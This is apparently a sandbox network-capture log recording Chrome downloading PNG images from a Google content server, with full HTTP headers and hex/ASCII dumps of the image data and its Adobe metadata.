                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1513444
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:10:00 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:10:00 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 1898
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30 32 32 3a 30 39 3a 30 38 20 31 37 3a 31 33 3a 34 33 00 00 04 90 04 00 02 00 00 00 14 00 00 00 e2 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VsRGBeXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)2022:09:08 17:13:43
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 36 35 35 33 35 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 39 32 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 31 30 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: obe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>65535</exif:ColorSpace> <exif:PixelXDimension>1920</exif:PixelXDimension> <exif:PixelYDimension>1080</exif:PixelYDimension>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 20 20 20 20 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 64 69 64 3a 62 61 61 35 38 39 37 36 2d 65 39 32 36 2d 34 64 35 38 2d 61 35 39 61 2d 62 33 36 33 38 64 63 37 64 66 63 65 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 61 33 34 30 32 37 36 2d 36 65 35 35 2d 65 36 34 35 2d 38 39 38 31 2d 61 62 63 38 36 35 32 35 33 35 32 31
                                                                                                                                                                                                                                                                                          Data Ascii: </rdf:li> </rdf:Seq> </xmpMM:History> <xmpMM:OriginalDocumentID>xmp.did:baa58976-e926-4d58-a59a-b3638dc7dfce</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>adobe:docid:photoshop:7a340276-6e55-e645-8981-abc865253521
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: ee 5d 34 c8 85 ef cf 54 81 87 0f f7 62 11 7b f0 05 7a 8f 6e bc cc 27 6f 32 1c 67 a9 16 9f e9 f9 ae fe 30 19 d3 3b df ad 3f 92 9b 1e ee aa c7 c6 fb ea ef f8 5b f5 3e e0 e0 7d 4c 9f 3e d5 1d 1f 8f 6f 94 f3 81 07 c5 84 f5 07 32 25 6f 45 f5 c5 b7 7d e8 85 fd d9 59 79 f2 4f 57 78 15 3b ab 4b 16 fe 7f 5f 39 5d cf 56 95 bd bf ef c3 3f e2 4f f9 fb fc c9 a7 06 4c 74 dc a7 76 77 c5 aa 39 c1 95 3f b2 be bf 3c ee 73 d5 67 42 f1 3f aa b8 6b 4f ce 87 77 21 68 ab a8 e3 27 7d 1e f5 39 72 d2 86 1e fd 10 de bb 77 e1 49 f1 c0 af fe f0 ae 40 c3 75 df 91 b3 78 23 86 3f 98 8f 1d b9 49 f4 ee be 76 95 bd 4b fe fb 64 64 3b 7c cd 5f c2 75 1f 0e 7d f1 61 82 7d b8 7f 55 e5 eb ea 3f 5c de 64 ef b7 c9 bd be 5c 3f a5 83 b7 af 5e 5d 7e f9 e5 c7 cb ab d7 bf 5c 5e fc f2 f3 e5 87 1f be bf
                                                                                                                                                                                                                                                                                          Data Ascii: ]4Tb{zn'o2g0;?[>}L>o2%oE}YyOWx;K_9]V?OLtvw9?<sgB?kOw!h'}9rwI@ux#?IvKdd;|_u}a}U?\d\?^]~\^
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 9f 76 1f c4 31 c4 70 30 fe 8f ee 37 e7 aa 80 ef 70 84 8d cf 93 e9 7e 7d 5e 5f 5b 3f 6c be b3 86 b5 27 e3 bb e4 3b d7 07 c5 ec 04 26 57 c5 f3 c7 cd 9d d3 6d 6e 93 1c fc e2 aa f7 fc 21 f1 8e 3f c5 0f 7b de 15 0f e8 b6 1e 72 65 b6 c2 6c bf f9 20 9e da c4 63 65 5c 68 db 31 9a a2 c9 3b 5f a8 02 0f b5 0c f6 c4 c3 cd 65 6b 74 e6 98 d7 b6 d7 dd 87 1a 7f a8 0f 20 cb 86 6b eb b8 71 78 d7 27 4a f2 2f 3e c8 f7 74 dc f7 31 7c 38 3a bc e2 9f 46 6d 67 8e 70 ce b0 c7 85 36 8f 24 67 05 8f af f3 88 03 7d be d7 37 d8 f3 b3 0d af 62 6d 5e d4 9e 5e e3 29 fd be 7b 5f cc 8b ac f9 02 9e f8 da e6 83 c5 d6 fb 77 e2 e1 19 cf 5c 23 68 57 75 6d 8e af f3 73 ba 78 1c 4f e2 02 7e 36 a7 6f 7e d0 60 31 fb 3e 78 d8 d8 19 2d ba 1e bf c5 fa 47 0f ea cf fd bd ab fd 91 8f 8e e3 89 5f cf fe cd
                                                                                                                                                                                                                                                                                          Data Ascii: v1p07p~}^_[?l';&Wmn!?{rel ce\h1;_ekt kqx'J/>t1|8:Fmgp6$g}7bm^^){_w\#hWumsxO~6o~`1>x-G_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: e3 e9 ad c4 c7 1b 65 f7 5d e8 c7 d3 6d 32 c8 bf 68 31 78 7a 91 30 c3 3b 3f a3 57 3a a1 1d 89 d1 b7 5d 28 95 23 68 d2 ac bf 9c b8 23 ce bd 4e bf ef b3 11 ff 59 92 37 2a 12 05 fa 95 71 4e b9 f1 f7 8c 39 b5 e4 04 a3 4a 87 67 ec e2 11 0f 24 f4 70 1d 2f 26 ca 12 d4 95 96 04 2b 41 16 2f 4f f8 c1 15 fe d1 a3 67 e9 59 f2 ef 6d 31 31 74 f5 ab 0f 26 d7 3b b9 f2 5e b1 a4 60 c8 6a d6 c5 41 73 29 ba 2a 17 72 26 c3 cd 46 f9 d1 eb 92 c2 bb 89 c3 27 a2 25 39 22 a9 49 46 dd 53 02 88 6f d5 3a 7a 5d 88 74 ec 22 76 09 d2 f8 72 bc 1b 88 e1 7a 14 1f 6f 4b 16 49 ca be c9 0e af b3 3d 39 02 58 9f 79 92 4f dc a5 0f 70 62 81 3e a6 1a 5f 2e 2e 16 ab 92 5f 42 77 71 0f 1f 64 d6 ed 02 70 f1 82 b7 b7 0d fe 69 b4 bf b6 ea 37 b6 d4 97 9f 74 45 fa 16 8f ec 59 32 f2 c3 3b e3 0a 1b f0 7b fd
                                                                                                                                                                                                                                                                                          Data Ascii: e]m2h1xz0;?W:](#h#NY7*qN9Jg$p/&+A/OgYm11t&;^`jAs)*r&F'%9"IFSo:z]t"vrzoKI=9XyOpb>_.._Bwqdpi7tEY2;{
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 6a ac fd 15 c1 7c 37 5e e6 f3 57 39 de 99 30 d7 7e fa af a1 c9 ba 4d 1b 89 f4 dd 43 48 87 c3 89 e7 f0 1d 5d 57 36 7d 1c 49 4e df 49 fe 33 6b 49 2c fd b6 7e b2 3e 7b fc 63 88 8f b2 a3 19 a2 ea b1 b6 f8 34 3d 1c fd 1c 38 78 3b 0f 0e e8 a7 8d ec f1 b6 81 e6 f4 57 b4 3f fe 75 7c fc 33 a8 d9 fa b4 3c 41 25 28 f6 4e 2a 96 62 0f be b9 60 37 7b 9f 20 86 15 76 1e 8b a3 7d e8 30 06 0e 67 0a 36 1d ae ce 1d e6 b7 40 e9 f6 04 b2 c3 27 60 89 99 6d f5 9f 20 a7 db 13 60 0d 7d e9 c0 6a 5d 81 30 7c 70 74 78 68 9c 56 9a 44 43 5b f1 83 7c a7 02 2c 69 f4 b1 b3 3f b2 ac 5f a9 54 3a e6 0e c2 1d 2b 1e 95 43 03 67 06 46 09 8d 83 96 2f 04 41 56 3e 52 fb 1b ee 9b 1d 0e 2f 9f 7c f0 e0 8d 76 f1 18 2e 09 99 93 54 43 43 a2 cb 85 f4 8d 6a bc 86 53 12 82 fd 77 f1 e8 10 9f 93 f1 e8 00 33
                                                                                                                                                                                                                                                                                          Data Ascii: j|7^W90~MCH]W6}INI3kI,~>{c4=8x;W?u|3<A%(N*b`7{ v}0g6@'`m `}j]0|ptxhVDC[|,i?_T:+CgF/AV>R/|v.TCCjSw3
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: a1 7f 6d d8 79 36 cb be e2 37 9b ef ba 0b 75 a8 f8 5e 7f ec 7f 16 0a 04 1b 72 ab 6a 17 63 90 4f a6 05 d1 31 43 44 7d b0 7a e7 fd 93 90 4d c7 5f 78 e1 71 3c bb 46 46 f3 0a 10 8b 0e 9e 6d f4 dc ae f3 dd c0 b9 b5 c7 27 bd 05 ab 0e df 83 5b 9b cf be 6e 68 3e 2b 72 38 fc 57 ff d8 75 59 70 fa dd c8 37 66 e8 e3 37 1e e8 c1 b8 28 8e d1 dd ae 67 ae f8 c8 73 23 41 3f 6e 64 50 c4 6e 68 61 a9 ca ad 4a 83 ff aa 77 32 df 85 df 5c ee 5d e3 e4 fa 12 b1 93 85 0e e0 09 ba 8f 79 47 0d 43 b2 b1 31 c3 ab f1 11 3b d8 c9 78 3c f8 d3 30 d0 d3 a7 35 c3 e7 c1 90 7e d8 36 c8 ba ca e8 b8 11 7f 6e 0c c2 73 60 a9 50 9f 15 57 cf 35 1b 7b 47 1e c0 a4 3c 3a 9f 03 92 25 fd 1d 6e f4 a0 e3 db e3 6d 4a d4 06 2d 3e 80 32 48 73 d5 33 67 12 98 76 5e c5 fb ee 88 4a 36 a1 cf 9c 9a 6f 6c 42 5c ef
                                                                                                                                                                                                                                                                                          Data Ascii: my67u^rjcO1CD}zM_xq<FFm'[nh>+r8WuYp7f7(gs#A?ndPnhaJw2\]yGC1;x<05~6ns`PW5{G<:%nmJ->2Hs3gv^J6olB\
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 3f 6a e5 27 ec 56 40 2a 17 cf f4 8d 93 f0 80 df 2a cd 2f 4a 1c f5 e8 f6 18 52 16 bf 25 87 30 c9 5d d0 79 52 a2 f0 b4 3d ab e5 d6 0d ab 24 8f c7 90 f7 08 18 fd 26 8b 95 77 8f 4b 42 3f aa 5c 82 71 ab d7 ea 3f 8b e5 09 4a b7 1b 33 12 c6 1c 6a 17 36 04 4b c6 e9 20 18 78 8d eb 78 5a bc ab 5e f2 7c 09 39 ca 0b dc 38 57 a3 9a 25 7f 8f ee 57 30 9b 9a 2f 44 62 7e b5 fa 62 a0 84 8f c4 fa 1e ab aa 0e 0a 7e 47 0f 8f 25 d2 c4 82 70 c1 f1 2e bb ef 69 0e 4a 6d 2b 3a 56 75 3d 0e 37 7d 88 25 fa 84 15 96 ce c9 7f 26 ce fa e3 d5 0f f1 78 b5 e7 1e d5 96 4c 0b 3f 8c fc ee 71 7a 67 9f dd f8 d2 1b 29 75 73 15 bc 9d f1 58 5c d4 68 b1 4b c2 b1 ed 6d 7e 7f 1f 8f fa be 38 0d df e3 92 b2 7b 54 2a 5e 9f 3c 3d 8f 00 bf 0f e6 36 06 d0 c7 bb ad 6c ed 71 fc 2f bf 48 d2 0f ad b4 fd 65 f6
                                                                                                                                                                                                                                                                                          Data Ascii: ?j'V@**/JR%0]yR=$&wKB?\q?J3j6K xxZ^|98W%W0/Db~b~G%p.iJm+:Vu=7}%&xL?qzg)usX\hKm~8{T*^<=6lq/He
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 70 47 94 78 be 9a 0e bd 13 c8 e2 3b 9e d9 d4 ea b0 83 23 3c f9 26 c6 4e db 83 6f df d3 0d fd 1d 3f 5b e8 ef f8 ac 3e 3a 78 34 24 df 5d 34 16 34 05 4c f0 63 32 79 b2 9b 95 1c 87 e7 20 d1 ef c4 00 8f c1 62 ed da 8f 27 32 45 78 17 8f 2b 5f ab 70 d0 f9 79 7c e9 24 56 4e 50 de e4 26 7c ee 26 e8 ec e3 13 cf b3 8b 3e c2 02 ec cd 16 24 ba 7d 80 1c dd ea eb fa d2 7c 41 fd f8 a3 fb 63 8d ed 05 ba 63 de 70 e0 de 80 74 96 a0 f3 09 f2 0f fa ca a3 33 9d e7 4c be e2 55 93 05 59 3a 47 d7 39 9b 04 43 ce ea 0f 1e 53 21 fc 34 d0 6a 13 df ce e0 e1 2e fc f0 58 5f 5f e3 71 49 75 33 78 0d 1c d2 93 60 c9 b6 f7 fc b8 f2 47 11 38 65 b1 55 bd c4 c3 ec 90 70 1f e3 4e f2 f1 a5 25 01 c3 4c 2f 0f f5 41 71 cb 3b fc fa 9b 6d e2 3b 96 2a ae 3c 5d d1 57 2d 3f ee 8f 0f 1c bc 03 9c dc a7 cd
                                                                                                                                                                                                                                                                                          Data Ascii: pGx;#<&No?[>:x4$]44Lc2y b'2Ex+_py|$VNP&|&>$}|Accpt3LUY:G9CS!4j.X__qIu3x`G8eUpN%L/Aq;m;*<]W-?


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          97192.168.2.749867142.250.185.974435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC540OUTGET /xilsk7-wXZ16VD4gYsv-2bNtfVkjz5JE_aGh5eS8hhUVeUb8zmNPvGgyhgXLex3TpAf-Y3sMqDpCOmZ9SlHgsrZYTORpZpiinD-AJUE=s0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 351403
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:03:38 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:03:38 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 2280
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC857INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 03 cb 08 02 00 00 00 c0 01 e7 14 00 00 00 01 73 52 47 42 01 d9 c9 2c 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 05 5c 50 49 44 41 54 78 9c ec bd e7 77 e3 48 b2 ed 7b ff ff ef ef ad fb ee 3d e7 cc 74 77 c9 56 c9 55 bb 69 37 ed cd b4 ab 12 49 51 74 f2 de d1 c2 11 a0 79 1b 08 32 95 02 8d 1c 29 90 c4 fe ad bd d8 10 8b 2d 81 30 99 b9 91 91 11 ff ab 4d 08 21 84 10 42 08 21 24 96 fc af a8 77 80 10 42 08 21 84 10 42 48 34 d0 10 12 42 08 21 84 10 42 48 4c a1 21 24 84 10 42 08 21 84 90 98 42 43 48 08 21 84 10 42 08 21 31 85 86 90 10 42 08 21 84 10 42 62 0a 0d 21 21 84 10 42 08 21 84 c4 14 1a 42 42 08 21 84 10 42 08 89 29 34 84 84 10 42 08 21 84 10 12 53 68 08 09 21 84 10 42
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDRsRGB,pHYs\PIDATxwH{=twVUi7IQty2)-0M!B!$wB!BH4B!BHL!$B!BCH!B!1B!Bb!!B!BB!B)4B!Sh!B
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 86 05 55 6b 66 5f e1 63 f8 30 84 ff 0b ff af eb 35 e5 f7 f4 7a 3c b1 97 bd 6f 8e 7c 4e 92 10 42 08 21 84 10 f2 c2 d0 10 4e 0d 62 c0 e0 00 21 f8 37 18 39 98 3a 31 7e 30 78 a5 72 b5 af ca 95 5a 5f a9 7f aa 54 0d fc ef f8 25 f8 55 90 e7 79 8d 46 63 88 03 a4 15 24 84 10 42 08 21 64 66 a0 21 9c 50 42 a6 cb b7 82 8d 06 dc 9a 3e 01 08 2f 07 5f 57 2c 55 20 dd e0 89 c7 1b 2e fd c3 77 3e 5f ad d6 6a 35 d3 34 6d db 76 5d 57 ed 03 1d 20 21 84 10 42 08 21 b3 07 0d e1 a4 d3 6c 36 e1 03 1d c7 81 49 83 55 1b 34 e3 37 dc f8 f5 4a 59 c1 b0 34 f0 e7 2c cb c2 9f 86 33 8c fa 30 10 42 08 21 84 10 42 46 0f 0d e1 84 22 2b f7 e0 c4 6c db 36 0c df a7 95 02 42 8e 4e 19 3f e5 e8 1e 68 14 fb 7e 18 c2 df 82 0f ac 56 ab f8 8b 65 0d b1 85 92 a5 46 df c9 08 0f 11 21 84 10 42 08 21 e4 99
                                                                                                                                                                                                                                                                                          Data Ascii: Ukf_c05z<o|NB!Nb!79:1~0xrZ_T%UyFc$B!df!PB>/_W,U .w>_j54mv]W !B!l6IU47JY4,30B!BF"+l6BN?h~VeF!B!
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 34 5a 4d b7 e1 d9 75 c7 b4 2d c3 32 6b a6 01 dd 6b 53 25 64 c8 76 dc ba db 70 bd 3e bb d1 f7 b4 f6 bf 1e 1e 22 42 08 99 16 06 b4 5d 83 fc 52 27 65 68 10 7d 29 42 83 5c a9 55 07 2a f2 0e e8 ae ca e5 2a 8c aa 61 58 f5 ba a7 be a2 9e ff 8c 46 91 10 12 13 68 08 ef e3 91 83 7b b8 41 a7 ee 49 ac 4b e4 bd dd 04 4a 2a 47 39 8e 33 70 84 71 37 35 68 c8 5e 79 cd 06 ac 1c 0c 1d bc 5f d5 a8 c9 20 03 7d ba d2 c0 8e 7f 40 a6 01 a9 5e 85 fd e9 5b ba aa d5 2d 6a dc ff 7a a0 21 24 84 cc 12 8f 69 bb fc b8 50 cd 0a ba 0d cf b4 2d bd 65 9e 7c 43 58 ab 99 55 bf 57 f2 37 d0 0f b8 2e ab e6 12 42 62 0a 0d e1 7d 3c e6 89 29 de 94 6c da 95 ee ac 60 dc d6 0d 3e a0 03 ae 49 59 e1 7a bd de b7 af 0d bd a9 e6 03 c5 0a 62 c0 81 df 21 de af 54 29 8b 3a 56 b0 e6 77 eb 83 fe ae 1e 2f a4 e7
                                                                                                                                                                                                                                                                                          Data Ascii: 4ZMu-2kkS%dvp>"B]R'eh})B\U**aXFh{AIKJ*G93pq75h^y_ }@^[-jz!$iP-e|CXUW7.Bb}<)l`>IYzb!T):Vw/
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 79 89 72 49 af 3b 7f 5b 03 36 f2 06 f9 b9 ea 6f 08 43 d5 89 2a dd 2c d3 68 f3 4b a5 92 61 18 52 99 76 84 0b 35 09 21 24 5a 68 08 1f 81 ee 06 a5 9b 54 0b 2a 38 43 38 42 4d 74 d6 72 2d ff 8d 1a 15 e1 4a a8 7b 52 a7 b0 15 7a 6a 40 08 21 83 e8 9d 18 84 c1 90 84 55 62 36 1a 01 5e 80 eb ba b6 6d 3b 1a f5 2e f2 31 f9 5f 9e 63 17 75 c3 29 f5 06 0d cb 54 0d 5d 9f d2 f3 91 37 c8 cf 95 d5 a3 fe 5d 52 47 da 73 40 1c 76 ba 41 42 c8 cc 40 43 f8 08 f4 81 7e 28 58 94 59 46 47 a5 de da f1 13 25 7d 3c a4 b6 4b 95 b2 e5 d8 18 3c d1 10 12 42 9e 0c 0c 86 18 3f c3 30 54 24 02 ec 47 39 a0 54 2a 95 bb 54 ba a8 08 76 bc e2 ff b2 2c 0b 46 11 bf 41 fc e1 63 77 40 4f 9e ec 35 1b aa 30 ac ea ef 42 a9 a1 23 6f 90 9f ad fe 86 50 af a9 78 5b 7f a2 5c 95 f3 82 e3 5f 2c 16 b1 2d 47 98 91
                                                                                                                                                                                                                                                                                          Data Ascii: yrI;[6oC*,hKaRv5!$ZhT*8C8BMtr-J{Rzj@!Ub6^m;.1_cu)T]7]RGs@vAB@C~(XYFG%}<K<B?0T$G9T*Tv,FAcw@O50B#oPx[\_,-G
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 45 43 48 f5 4a af 4c a5 b2 cb 18 86 a1 9e 16 b7 b4 8c b5 91 5d d0 84 90 51 d0 ea 2e 46 6a 77 43 48 70 b3 cb 64 a0 2a 37 af 5a 86 c8 5b 27 6a ac ea a4 69 c5 76 a5 56 2e 97 31 5a d0 ab 3b 92 c9 67 f8 0c 61 b3 cb 03 ed e5 8b ed 36 21 23 84 86 f0 1e e4 de 46 e3 ae 2a f9 46 de f7 50 13 28 09 0f f3 f3 c8 07 0b 08 55 fd 89 50 22 f2 d0 06 21 64 da c1 30 11 f7 b8 e4 a0 0e 95 76 50 3f 46 de 40 51 63 95 54 ec a8 06 b5 44 fc cb a0 5c c6 f5 d0 68 84 b3 4c 93 48 10 47 87 d3 e1 79 9e 1b 60 75 31 35 0c 03 a7 af 3f f8 a4 1d e0 04 d4 03 f0 7b 1a 01 0f f4 8a 84 4c 38 34 84 f7 20 0f f9 d0 04 94 82 58 10 1a 42 aa af 4a e5 aa 32 84 b2 7a a8 e3 09 cb 65 f4 1c ed bb 0f 0e d9 6d 10 32 d5 e8 b7 30 46 99 b2 a0 00 37 7b a8 fe 7b e4 ed 12 f5 32 52 86 d0 34 6d 5c 09 c5 62 11 af 5c 49
                                                                                                                                                                                                                                                                                          Data Ascii: ECHJL]Q.FjwCHpd*7Z['jivV.1Z;ga6!#F*FP(UP"!d0vP?F@QcTD\hLHGy`u15?{L84 XBJ2zem20F7{{2R4m\b\I
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 10 42 06 a2 46 b1 8d 46 c3 30 8c 52 a9 44 43 48 3d 44 9d 8a 08 e5 72 ad 56 bb 67 19 e1 ac 8f e8 75 43 88 57 29 26 21 46 28 94 9a 85 e5 5b d4 6c a1 ac 2a 14 e1 5a b2 1c db 5f 58 48 43 48 c6 03 0d 21 21 84 10 32 10 35 82 c7 28 d6 4f 2e ca 19 42 ea 61 52 86 50 a2 46 87 5e 64 b3 3c a2 d7 27 06 71 13 99 a6 d9 89 bb ee c9 c6 59 b9 9b ae 33 26 52 d3 a4 b7 57 8e fc d8 5d 52 a8 4a 2f d6 4c c3 b0 4c d8 c2 be b3 85 84 3c 07 1a 42 42 08 21 e4 1e 24 5e 54 cf 78 11 f9 38 92 9a 74 49 d6 90 00 cb b2 62 5b 76 42 25 64 82 1b 34 0c 43 95 16 0c 47 48 c6 35 64 54 2f 5e af e4 1f 0d 2d e5 8c 9e 89 54 15 2d a4 21 24 23 84 86 90 10 42 08 b9 07 0c 6a 31 a6 97 f0 3f 1a 42 ea 41 92 d1 7c 90 39 d3 34 cd 46 a3 31 f8 f2 9a f1 11 bd e7 79 2a 3d af aa 31 a8 af 9d d3 6b cd 47 7f e2 5e 56
                                                                                                                                                                                                                                                                                          Data Ascii: BFF0RDCH=DrVguCW)&!F([l*Z_XHCH!!25(O.BaRPF^d<'qY3&RW]RJ/LL<BB!$^Tx8tIb[vB%d4CGH5dT/^-T-!$#Bj1?BA|94F1y*=1kG^V
